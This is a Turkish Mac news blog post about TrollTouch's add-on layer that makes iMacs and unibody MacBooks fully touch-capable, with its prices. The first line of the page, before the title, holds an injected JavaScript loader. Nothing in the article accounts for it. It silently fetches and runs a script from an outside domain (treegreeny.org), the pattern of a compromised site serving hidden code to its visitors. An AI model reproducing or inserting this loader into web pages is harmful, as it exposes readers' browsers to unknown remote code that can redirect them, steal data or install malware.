;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Gelecek Şimdiden... - elmasuyu.net
Kategoriler
Donanım Haber Teknik

Gelecek Şimdiden…

logoUzun zamandır tam dokunmatik Mac’ler konusunda birçok şey duyduk. Bunun aslında ne kadar gerçekleştirilebileceği de aslında kocaman bir soru işaretiydi ama Amerikalı TrollTouch şirketi bu duruma çok farklı bir yaklaşımla güzel bir çözüm buldu. Ekranınıza takılacak olan bir katman vasıtasıyla bilgisayarınız tam dokunmatik hale gelebilir ve hatta birçok işaretleme materyali ile de dokunmatikliğinizi dolasıya yaşayabilirsiniz. Değişikliğe uğrayabilecek Mac modelleri arasınra yeni iMac ler ve yekpare kasa MacBook’lar da mevcut. Şimdilik iki farklı şekilde edinebiliyorsunuz. Bunlardan birincisi istediğiniz makineyi bu firmadan dokunmatik destekli olarak almak; ikincisi ise elinizdeki makineyi dokunmatik hale getirmek. Haaa şimdiden söyleyelim…. Ucuz bir değişim değil bu… MacBook ekranı için 700 Amerikan doları vermeniz gerekiyor. Bilgisayarı firmadan edinirseniz bunun fiyatı da 1700 dolar. Nasıl çalıştığını görmek için video’ya göz atabilirsiniz.

Yazar Cem YENER

ElmaSuyu.Net Yöneticisi - Site faaliyetlerinin yanında bilgisayar dünyası ile yakından ilgili. Mac ve iOS özellikle ilgilendi konulardır.
Üniversite Program Koordinatörü - Bir devlet üniversitesinin İngilizce Hazırlık Programı Koordinatörü ve Akademik Direktörlüğünü yürütmekte.
@jamwinner